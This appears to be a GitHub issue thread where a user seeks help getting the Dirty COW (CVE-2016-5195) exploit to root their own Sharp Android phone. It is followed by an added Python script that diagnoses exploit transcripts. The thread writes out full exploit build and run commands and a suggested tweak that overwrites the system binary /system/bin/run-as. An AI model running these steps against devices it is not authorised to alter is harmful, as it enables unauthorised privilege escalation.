
Sharp AQUOS Keitai 2 601SH - setresgid/setresuid failed #108

Open
rasuberiimochi opened this issue Dec 14, 2024 · 3 comments

Comments

@rasuberiimochi

Trying to run this because there is no other way to try and get access to the system on this phone on Lollipop 32-bit.

Make test labels it as vulnerable.

```
make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-22
make[1]: Entering directory '/Users/xxx/Downloads/Dirtyc0w stardust/CVE-2016-5195-master'
[armeabi-v7a] Install : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory '/Users/xxx/Downloads/Dirtyc0w stardust/CVE-2016-5195-master'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
libs/armeabi-v7a/dirtycow: 1 file push...pped. 46.8 MB/s (9156 bytes in 0.000s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
libs/armeabi-v7a/run-as: 1 file pushed...pped. 26.2 MB/s (4696 bytes in 0.000s)
adb shell 'cat /system/bin/run-as > /data/local/tmp/run-as-original'
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as --no-pad'
WARNING: linker: Unsupported flags DT_FLAGS_1=0x8000001
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffef5 arg 0x4dc
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffffe arg 0x4bc
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6fffffff arg 0x1
dcow /data/local/tmp/run-as /system/bin/run-as
warning: source file size (4696) and destination file size (9444) differ
will overwrite first 4696 bytes of destination only

[*] size 4696
[*] mmap 0xb6e34000
[*] currently 0xb6e34000=464c457f
[*] using /proc/self/mem method
[*] madvise thread starts, address 0xb6e34000, size 4696
[*] check thread starts, address 0xb6e34000, size 4696
[*] check thread stops, patch successful, iterations 0
[*] /proc/self/mem 356896 76
[*] madvise thread stops, return code sum 0, iterations 497
[*] finished pid=0 sees 0xb6e34000=464c457f
```

```
adb shell
1|shell@SG601SH:/ $ /system/bin/run-as
WARNING: linker: Unsupported flags DT_FLAGS_1=0x8000001
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6ffffef5 arg 0x3c8
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6ffffffe arg 0x388
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6fffffff arg 0x2
uid /system/bin/run-as 2000
setresgid/setresuid failed
uid 2000
0 u:r:runas:s0
context 0 u:r:shell:s0
shell@SG601SH:/ $
```

@rasuberiimochi (Author)

I suppose I should ref these issues for explanation? If SELinux capabilities are changed, does that mean the whole Dirtyc0w exploit is blocked from executing?

#45
#38
#88

@timwr (Owner)

timwr commented Dec 14, 2024

> warning: source file size (4696) and destination file size (9444) differ
> will overwrite first 4696 bytes of destination only

I suspect it's because of this. You could try overwriting the run-as file with null bytes first?
E.g.

```
truncate -s 9444 nullfile
adb push nullfile /data/local/tmp
adb shell /data/local/tmp/dcow /data/local/tmp/nullfile /system/bin/run-as
make root
```

@rasuberiimochi (Author)

rasuberiimochi commented Dec 14, 2024

Thank you!

```
adb shell /data/local/tmp/dcow /data/local/tmp/nullfile /system/bin/run-as
WARNING: linker: Unsupported flags DT_FLAGS_1=0x8000001
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffef5 arg 0x4dc
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffffe arg 0x4bc
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6fffffff arg 0x1
dcow /data/local/tmp/nullfile /system/bin/run-as
[*] size 9444
[*] mmap 0xb6ea9000
[*] currently 0xb6ea9000=464c457f
[*] using /proc/self/mem method
[*] check thread starts, address 0xb6ea9000, size 9444
[*] madvise thread starts, address 0xb6ea9000, size 9444
[*] /proc/self/mem 8735700 925
[*] check thread stops, patch successful, iterations 1
[*] madvise thread stops, return code sum 0, iterations 8055
[*] finished pid=0 sees 0xb6ea9000=0
```

make root and shell return the same errors as before.
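As an added example (not code from this repository or from either commenter), a small Python checker that reads a transcript like the ones in this thread and separates the two distinct failure modes discussed here: the partial overwrite caused by the source/destination size mismatch, and the setresgid/setresuid denial that remains even once the patch itself reports success. The sample transcript is constructed from lines quoted in this issue; the regular expressions are written against those lines only.

```python
import re

# Constructed sample: lines copied from the transcript in this issue (the dcow
# size warning, its completion lines, and the subsequent run-as invocation).
SAMPLE_OUTPUT = """\
warning: source file size (4696) and destination file size (9444) differ
will overwrite first 4696 bytes of destination only
[*] check thread stops, patch successful, iterations 0
[*] finished pid=0 sees 0xb6e34000=464c457f
uid /system/bin/run-as 2000
setresgid/setresuid failed
uid 2000
0 u:r:runas:s0
context 0 u:r:shell:s0
"""

SIZE_RE = re.compile(r"source file size \((\d+)\) and destination file size \((\d+)\)")
FINAL_RE = re.compile(r"finished pid=\d+ sees 0x[0-9a-f]+=([0-9a-f]+)")
UID_RE = re.compile(r"^uid (\d+)$", re.MULTILINE)      # bare "uid N" lines only
CTX_RE = re.compile(r"\b(u:r:\w+:s0)\b")               # SELinux contexts as printed


def diagnose(output: str) -> dict:
    """Summarise a dcow + run-as transcript into structured findings."""
    f = {"size_mismatch": None, "patch_successful": False, "final_word": None,
         "uid_after": None, "setresuid_failed": False, "contexts": [], "notes": []}
    m = SIZE_RE.search(output)
    if m:
        src, dst = int(m.group(1)), int(m.group(2))
        f["size_mismatch"] = (src, dst)
        if src < dst:
            f["notes"].append(f"only {src} of {dst} destination bytes are replaced; "
                              "the remaining tail of the original file is left in place")
    f["patch_successful"] = "patch successful" in output
    m = FINAL_RE.search(output)
    if m:
        f["final_word"] = m.group(1)
        # 464c457f is the little-endian word for the bytes 7f 45 4c 46 (\x7fELF)
        if f["final_word"] != "464c457f":
            f["notes"].append("first word of the target is no longer an ELF header")
    uids = UID_RE.findall(output)
    if uids:
        f["uid_after"] = int(uids[-1])       # uid reported after the setres* attempt
    f["setresuid_failed"] = "setresgid/setresuid failed" in output
    f["contexts"] = CTX_RE.findall(output)
    if f["patch_successful"] and f["setresuid_failed"]:
        f["notes"].append("write succeeded but the uid change was denied: the block "
                          "is at the privilege change, not at the file overwrite")
    return f
```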
